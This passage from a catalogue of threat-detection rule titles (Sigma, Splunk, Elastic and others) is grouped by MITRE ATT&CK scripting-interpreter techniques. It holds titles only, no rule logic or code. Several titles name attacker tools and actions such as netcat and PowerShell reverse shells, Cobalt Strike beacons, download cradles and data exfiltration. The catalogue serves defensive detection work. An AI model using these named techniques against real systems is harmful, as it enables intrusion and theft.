- Sigma Windows Suspicious Child Process from Node.js - React2Shell experimental
- Splunk Windows Suspicious React or Next.js Child Process production
- Splunk Windows Suspicious VMWare Tools Child Process production
- Elastic Windows System Information Discovery production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows TinyCC Shellcode Execution production
- Splunk Windows WinDBG Spawning AutoIt3 production
- Splunk Windows XLL File Creation Outside of Typical Location production
- Sigma WMImplant Hack Tool test
- Sigma Writing Of Malicious Files To The Fonts Folder test
- Sigma WScript or CScript Dropper - File test
- Sigma Wscript Shell Run In CommandLine test
- Splunk Wscript_Cscript Execution (PowerShell)
- Splunk Wscript_Cscript Execution (Sysmon)
- Splunk Wscript_Cscript Execution (Windows Event Log)
- Sigma WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript test
- Sigma XSL Script Execution Via WMIC.EXE test
- Sigma ZxShell Malware test
Command and Scripting Interpreter: PowerShell T1059.001 406 rules
- Sigma Alternate PowerShell Hosts - PowerShell Module test
- Sigma Alternate PowerShell Hosts Pipe test
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Bad Opsec Powershell Code Artifacts test
- Sigma Base64 Encoded PowerShell Command Detected test
- YARA-L Base64 Encoded PowerShell Command Detected
- Sigma BloodHound Collection Files test
- Sigma bXOR Operator Usage In PowerShell Command Line - PowerShell Classic test
- Splunk Bypass or Unrestricted PowerShell Execution (PowerShell)
- Sigma Certificate Exported Via PowerShell test
- Sigma Change PowerShell Policies to an Insecure Level test
- Sigma Change PowerShell Policies to an Insecure Level - PowerShell test
- Sigma ChromeLoader Malware Execution test
- Elastic Clearing Windows Console History production
- Sigma Cmd.EXE Missing Space Characters Execution Anomaly test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Execution via SolarWinds Process production
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Command-Line Interface Execution (PowerShell)
- Splunk Command-Line Interface Execution (Sysmon)
- Splunk Command-Line Interface Execution (Windows Event Log)
- Splunk Common Exchange Recon cmdlets (PowerShell)
- Sigma ConvertTo-SecureString Cmdlet Usage Via CommandLine test
- YARA-L ConvertTo-SecureString Cmdlet Usage Via CommandLine
- Sigma CVE-2022-24527 Microsoft Connected Cache LPE test
- Elastic Delayed Execution via Ping production
- Splunk Detect Certify With PowerShell Script Block Logging production
- Splunk Detect Empire with PowerShell Script Block Logging production
- Splunk Detect Mimikatz With PowerShell Script Block Logging production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Sigma DSInternals Suspicious PowerShell Cmdlets test
- Sigma DSInternals Suspicious PowerShell Cmdlets - ScriptBlock test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Splunk Encoded Powershell Command (PowerShell)
- Splunk Encoded Powershell Command (Sysmon)
- Splunk Encoded Powershell Command (Windows Event Log)
- Sigma Encoded PowerShell payload deployed (PowerShell) experimental
- Splunk Exchange PowerShell Module Usage production
- Sigma Exchange PowerShell Snap-Ins Usage test
- Kusto Exchange Worker Process Making Remote Call
- Sigma Execute Code with Pester.bat test
- Sigma Execute Code with Pester.bat as Parent test
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of Persistent Suspicious Program production
- Sigma Execution of Powershell Script in Public Folder test
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Elastic Exporting Exchange Mailbox via PowerShell production
- Sigma FakeUpdates/SocGholish Activity test
- Splunk Get-ForestTrust with PowerShell Script Block production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Sigma Greenbug Espionage Group Indicators test
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - Covenant PowerShell Launcher test
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - Empire PowerShell Launch Parameters test
- Sigma Headless Process Launched Via Conhost.EXE test
- Sigma Hidden Powershell in Link File Pattern test
- Splunk High Entropy Powershell (PowerShell)
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket_Empire's WMIExec (Windows Event Log)
- Sigma Import PowerShell Modules From Suspicious Directories test
- Sigma Import PowerShell Modules From Suspicious Directories - ProcCreation test
- Elastic Incoming Execution via PowerShell Remoting production
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Splunk Invoke-Expression Command (PowerShell)
- Splunk Invoke-Expression Command (Sysmon)
- Splunk Invoke-Expression Command (Windows Event Log)
- Sigma Invoke-Obfuscation CLIP+ Launcher test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation CLIP+ Launcher - Security test
- Sigma Invoke-Obfuscation CLIP+ Launcher - System test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - Security test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - System test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - Security test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - System test
- Sigma Invoke-Obfuscation STDIN+ Launcher test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Powershell test
- Sigma Invoke-Obfuscation STDIN+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Security test
- Sigma Invoke-Obfuscation STDIN+ Launcher - System test
- Sigma Invoke-Obfuscation VAR+ Launcher test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation VAR+ Launcher - Security test
- Sigma Invoke-Obfuscation VAR+ Launcher - System test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System test
- Sigma Invoke-Obfuscation Via Stdin test
- Sigma Invoke-Obfuscation Via Stdin - Powershell test
- Sigma Invoke-Obfuscation Via Stdin - PowerShell Module test
- Sigma Invoke-Obfuscation Via Stdin - Security test
- Sigma Invoke-Obfuscation Via Stdin - System test
- Sigma Invoke-Obfuscation Via Use Clip test
- Sigma Invoke-Obfuscation Via Use Clip - Powershell test
- Sigma Invoke-Obfuscation Via Use Clip - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Clip - Security test
- Sigma Invoke-Obfuscation Via Use Clip - System test
- Sigma Invoke-Obfuscation Via Use MSHTA test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use MSHTA - Security test
- Sigma Invoke-Obfuscation Via Use MSHTA - System test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Rundll32 - Security test
- Sigma Invoke-Obfuscation Via Use Rundll32 - System test
- Splunk Invoke-WebRequest Command (PowerShell)
- Splunk Invoke-WebRequest Command (Sysmon)
- Splunk Invoke-WebRequest Command (Windows Event Log)
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Lace Tempest PowerShell Evidence Eraser test
- Sigma Lace Tempest PowerShell Launcher test
- Sigma Malicious Base64 Encoded PowerShell Keywords in Command Lines test
- Sigma Malicious Nishang PowerShell Commandlets test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Malicious PowerShell Keywords test
- Splunk Malicious PowerShell Process - Execution Policy Bypass production
- Splunk Malicious PowerShell Process With Obfuscation Techniques production
- Sigma Malicious PowerShell Scripts - FileCreation test
- Sigma Malicious PowerShell Scripts - PoshModule test
- Sigma Malicious ShellIntel PowerShell Commandlets test
- Sigma MERCURY APT Activity test
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk Modify Exchange Access Settings (PowerShell)
- Sigma Net WebClient Casing Anomalies test
- Sigma Netcat The Powershell Version test
- Sigma Network Connection Initiated By PowerShell Process test
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New PowerShell Instance Created test
- Splunk Nishang PowershellTCPOneLine production
- Sigma Non Interactive PowerShell Process Spawned test
- Sigma Nslookup PowerShell Download Cradle test
- Sigma NTFS Alternate Data Stream test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Sigma Obfuscated PowerShell OneLiner Execution test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Payload downloaded via PowerShell
- Sigma PipeShell exfiltration over named pipes experimental
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential APT FIN7 Exploitation Activity test
- Sigma Potential APT FIN7 POWERHOLD Execution test
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential Bumblebee Remote Thread Creation test
- Elastic Potential Command Shell via NetCat production
- Sigma Potential Data Exfiltration Activity Via CommandLine Tools test
- Sigma Potential DLL File Download Via PowerShell Invoke-WebRequest test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Emotet Activity stable
- Sigma Potential Encoded PowerShell Patterns In CommandLine test
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential PowerShell Command Line Obfuscation test
- Sigma Potential PowerShell Downgrade Attack test
- Sigma Potential PowerShell Obfuscation Using Alias Cmdlets test
- Sigma Potential PowerShell Obfuscation Using Character Join test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Sigma Potential PowerShell Obfuscation Via Reversed Commands test
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma Potential PowerShell Obfuscation Via WCHAR/CHAR test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potential Powershell ReverseShell Connection stable
- Sigma Potential POWERTRASH Script Execution test
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Sigma Potential Remote PowerShell Session Initiated test
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Suspicious PowerShell Keywords test
- Elastic Potential Veeam Credential Access Command production
- Sigma Potential WinAPI Calls Via PowerShell Scripts test
- Sigma Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell stable
- Sigma Potentially Suspicious Command Executed Via Run Dialog Box - Registry test
- Sigma Potentially Suspicious PowerShell Child Processes test
- Sigma Potentially Suspicious Powershell Script Execution From Temp Folder test
- Sigma Potentially Suspicious WebDAV LNK Execution test
- Splunk PowerShell - Connect To Internet With Hidden Window production
- Splunk PowerShell 4104 Hunting production
- Sigma PowerShell ADRecon Execution test
- Sigma PowerShell Base64 Encoded FromBase64String Cmdlet test
- Sigma PowerShell Base64 Encoded IEX Cmdlet test
- Sigma PowerShell Base64 Encoded Invoke Keyword test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Sigma PowerShell Base64 Encoded WMI Classes test
- Sigma PowerShell Called from an Executable Version Mismatch test
- Splunk PowerShell Clipboard Access (PowerShell)
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Sigma PowerShell Core DLL Loaded By Non PowerShell Process test
- Sigma PowerShell Create Local User test
- Splunk PowerShell CreateDecryptor (PowerShell)
- Splunk PowerShell CreateDecryptor (Sysmon)
- Splunk PowerShell CreateDecryptor (Windows Event Log)
- Splunk Powershell Creating Thread Mutex production
- Sigma PowerShell Credential Prompt test
- Splunk PowerShell Domain Enumeration production
- Splunk PowerShell Downgrade (PowerShell)
- Splunk PowerShell Downgrade (Sysmon)
- Splunk PowerShell Downgrade (Windows Event Log)
- Sigma PowerShell Downgrade Attack - PowerShell test
- Splunk PowerShell Download Activity (PowerShell)
- Sigma PowerShell Download Pattern test
- Sigma PowerShell Download Via Net.WebClient - PowerShell Classic test
- YARA-L PowerShell DownloadFile
- Splunk PowerShell DownloadFile_DownloadString (PowerShell)
- Splunk PowerShell DownloadFile_DownloadString (Sysmon)
- Splunk PowerShell DownloadFile_DownloadString (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerShell Enable PowerShell Remoting production
- Splunk PowerShell Environment Variable Execution production
- Splunk Powershell Execute COM Object production
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk Powershell Fileless Script Contains Base64 Encoded Content production
- Splunk Powershell ICMP Data Exfiltration (PowerShell)
- Sigma Powershell Inline Execution From A File test
- Splunk Powershell Load Module in Meterpreter production
- Splunk PowerShell Loading DotNET into Memory via Reflection production
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Sigma Powershell MsXml COM Object test
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Processing Stream Of Data production
- Sigma PowerShell PSAttack test
- Sigma PowerShell Remote Session Creation test
- Splunk PowerShell Script Block With URL Chain production
- Sigma PowerShell Script Run in AppData test
- Sigma PowerShell ShellCode test
- Splunk PowerShell Start or Stop Service production
- Splunk Powershell Using memory As Backing Store production
- Sigma PowerShell Web Access Installation - PsScript test
- YARA-L PowerShell Web Download
- Splunk PowerShell WebRequest Using Memory Stream production
- Kusto PowerShell without powershell.exe
- Sigma Powershell XML Execute Command test
- Splunk PowerShell XML Retrieval (PowerShell)
- Splunk PowerShell XML Retrieval (Sysmon)
- Splunk PowerShell XML Retrieval (Windows Event Log)
- Sigma PowerView PowerShell Cmdlets - ScriptBlock test
- Splunk PowerView_SharpView Commands (PowerShell)
- Elastic Process Activity via Compiled HTML File production
- Elastic Proxy Execution via Console Window Host production
- Sigma PSAsyncShell - Asynchronous TCP Reverse Shell test
- Sigma Raspberry Robin Initial Execution From External Drive test
- Sigma Raspberry Robin Subsequent Execution of Commands test
- Splunk Recon Using WMI Class production
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Elastic Remote File Download via PowerShell production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Sigma Remote PowerShell Sessions Network Connections (WinRM) test
- Sigma Remote Thread Creation Via PowerShell test
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma Rorschach Ransomware Execution Activity test
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Set Default PowerShell Execution Policy To Unrestricted or Bypass production
- Sigma Silence.EDA Detection test
- Sigma SQL Client Tools PowerShell Session Detection test
- Sigma Suspicious CrushFTP Child Process experimental
- Sigma Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call test
- Sigma Suspicious Encoded PowerShell Command Line test
- Splunk Suspicious Executable by Powershell (EDR)
- Splunk Suspicious Executable by Powershell (Sysmon)
- Splunk Suspicious Executable by Powershell (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Sigma Suspicious Execution of Powershell with Base64 test
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Execution From Internet Hosted WebDav Share test
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious Interactive PowerShell as SYSTEM test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Splunk Suspicious Powershell (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (Sysmon)
- Splunk Suspicious PowerShell Clipboard Activity (Windows Event Log)
- Sigma Suspicious PowerShell Download - PoshModule test
- Sigma Suspicious PowerShell Download - Powershell Script test
- Sigma Suspicious PowerShell Download and Execute Pattern test
- Sigma Suspicious PowerShell Encoded Command Patterns test
- Sigma Suspicious PowerShell IEX Execution Patterns test
- Sigma Suspicious PowerShell Invocation From Script Engines test
- Sigma Suspicious PowerShell Invocations - Generic test
- Sigma Suspicious PowerShell Invocations - Generic - PowerShell Module test
- Sigma Suspicious PowerShell Invocations - Specific test
- Sigma Suspicious PowerShell Invocations - Specific - PowerShell Module test
- Sigma Suspicious PowerShell Parameter Substring test
- Splunk Suspicious PowerShell Parameter Substring (PowerShell)
- Splunk Suspicious PowerShell Parameter Substring (Sysmon)
- Splunk Suspicious PowerShell Parameter Substring (Windows Event Log)
- Sigma Suspicious PowerShell Parent Process test
- Sigma Suspicious PrinterPorts Creation (CVE-2020-1048) test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious WSMAN Provider Image Loads test
- Sigma Suspicious XOR Encoded PowerShell Command test
- Elastic Suspicious Zoom Child Process production
- Elastic System Shells via Services production
- Sigma TropicTrooper Campaign November 2018 stable
- Sigma Turla Group Commands May 2020 test
- Sigma UNC2452 PowerShell Pattern test
- Sigma UNC2452 Process Creation Patterns test
- Sigma Uncommon PowerShell Hosts test
- Splunk Unloading AMSI via Reflection production
- Sigma Unusually Long PowerShell CommandLine test
- Sigma Usage Of Web Request Commands And Cmdlets test
- Sigma Usage Of Web Request Commands And Cmdlets - ScriptBlock test
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Vice Society directory crawling script for data exfiltration (via ps_script) stable
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk WebLogic CVE-2017-10271 (PowerShell)
- Splunk WebLogic CVE-2017-10271 (Sysmon)
- Splunk WebLogic CVE-2017-10271 (Windows Event Log)
- Sigma WinAPI Function Calls Via PowerShell Scripts test
- Sigma WinAPI Library Calls Via PowerShell Scripts test
- Splunk Windows Account Access Removal via Logoff Exec production
- Splunk Windows Cobalt Strike PowerShell Loader production
- Splunk Windows Crowdstrike RTR Script Execution production
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Elastic Windows Defender Exclusions Added via PowerShell production
- Splunk Windows Enable PowerShell Web Access production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows File Download Via PowerShell production
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows Powershell Cryptography Namespace production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows PowerShell Get CIMInstance Remote Computer production
- Splunk Windows Powershell Import Applocker Policy production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows PowerShell Invoke-Sqlcmd Execution production
- Splunk Windows Powershell Logoff User via Quser production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
- Splunk Windows PowerShell Process With Malicious String production
- Splunk Windows Powershell RemoteSigned File production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows PowerShell Script Block With Malicious String production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Splunk Windows PowerShell Script TabExpansion Direct Call production
- Splunk Windows PowerShell WMI Win32 ScheduledJob production
- Splunk Windows PowGoop Beacon Decoding production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows Shell Process from CrushFTP production
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Splunk Windows Software Discovery Via PowerShell production
- Splunk Windows SSH Proxy Command production
- Splunk Windows Suspicious React or Next.js Child Process production
- Sigma WMImplant Hack Tool test
Command and Scripting Interpreter: AppleScript T1059.002 2 rules
- Sigma Atomic MacOS Stealer - FileGrabber Activity experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
Command and Scripting Interpreter: Windows Command Shell T1059.003 138 rules
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Binary Content Copy via Cmd.exe production
- Splunk CMD Carry Out String Command Parameter production
- Splunk CMD Echo Pipe - Escalation production
- Splunk CMD execution with _c (PowerShell)
- Splunk CMD execution with _c (Sysmon)
- Splunk CMD execution with _c (Windows Event Log)
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Execution via SolarWinds Process production
- Splunk Command Line .cmd Execution (Sysmon)
- Splunk Command Line .cmd Execution (Windows Event Log)
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Command-Line Interface Execution (PowerShell)
- Splunk Command-Line Interface Execution (Sysmon)
- Splunk Command-Line Interface Execution (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Sigma Conhost.exe CommandLine Path Traversal test
- Elastic Delayed Execution via Ping production
- Splunk Detect Prohibited Applications Spawning cmd exe production
- Splunk Detect Use of cmd exe to Launch Script Interpreters production
- Sigma DNS Query by Finger Utility experimental
- Sigma Elise Backdoor Activity test
- Sigma Encoded PowerShell payload deployed via process execution experimental
- Kusto Exchange Worker Process Making Remote Call
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Jlaive In-Memory Assembly Execution test
- Sigma HackTool - Koadic Execution test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma Headless Process Launched Via Conhost.EXE test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Metasploit reverse shell injection in SQL Server experimental
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Sigma Network Connection Initiated via Finger.EXE experimental
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma Operator Bloopers Cobalt Strike Commands test
- Sigma Operator Bloopers Cobalt Strike Modules test
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Sigma Potential APT FIN7 Exploitation Activity test
- Sigma Potential Baby Shark Malware Activity test
- Elastic Potential Command Shell via NetCat production
- Sigma Potential CommandLine Path Traversal Via Cmd.EXE test
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Sigma Potential SAP NetWeaver Webshell Creation experimental
- Sigma Potential SAP NetWeaver Webshell Creation - Linux experimental
- Elastic Potential SharpRDP Behavior production
- Splunk PowerShell Downgrade (PowerShell)
- Splunk PowerShell Downgrade (Sysmon)
- Splunk PowerShell Downgrade (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Execute Batch Script test
- Sigma Powershell Executed From Headless ConHost Process test
- Elastic Process Activity via Compiled HTML File production
- Elastic Proxy Execution via Console Window Host production
- Sigma PUA - AdvancedRun Execution test
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Sigma Read Contents From Stdin Via Cmd.EXE test
- Sigma Remote Access Tool - ScreenConnect Command Execution test
- Sigma Remote Access Tool - ScreenConnect File Transfer test
- Sigma Remote Access Tool - ScreenConnect Remote Command Execution test
- Sigma Remote Access Tool - ScreenConnect Temporary File test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Sigma Rorschach Ransomware Execution Activity test
- Splunk Ryuk Wake on LAN Command production
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Sigma Serial console process spawning CMD shell (via command) experimental
- Elastic Service Control Spawned via Script Interpreter production
- Splunk SharpHound Enumeration (Windows Event Log)
- Sigma Sofacy Trojan Loader Activity test
- Sigma Suspicious Child Process of SAP NetWeaver experimental
- Sigma Suspicious Child Process of SAP NetWeaver - Linux experimental
- Elastic Suspicious Cmd Execution via WMI production
- Elastic Suspicious Command Prompt Network Connection production
- Sigma Suspicious CrushFTP Child Process experimental
- Splunk Suspicious Executable by Powershell (EDR)
- Splunk Suspicious Executable by Powershell (Sysmon)
- Splunk Suspicious Executable by Powershell (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious HWP Sub Processes test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Zoom Child Process production
- Elastic System Information Discovery via Windows Command Shell production
- Elastic System Shells via Services production
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk Windows Command Shell DCRat ForkBomb Payload production
- Splunk Windows File Association Modification via Ftype production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows Powershell History File Deletion production
- Splunk Windows PowerShell Invoke-Sqlcmd Execution production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows Shell Process from CrushFTP production
- Splunk Windows SQLCMD Execution production
- Splunk Windows Suspicious React or Next.js Child Process production
- Elastic Windows System Information Discovery production
- Splunk Windows TinyCC Shellcode Execution production
- Sigma ZxShell Malware test
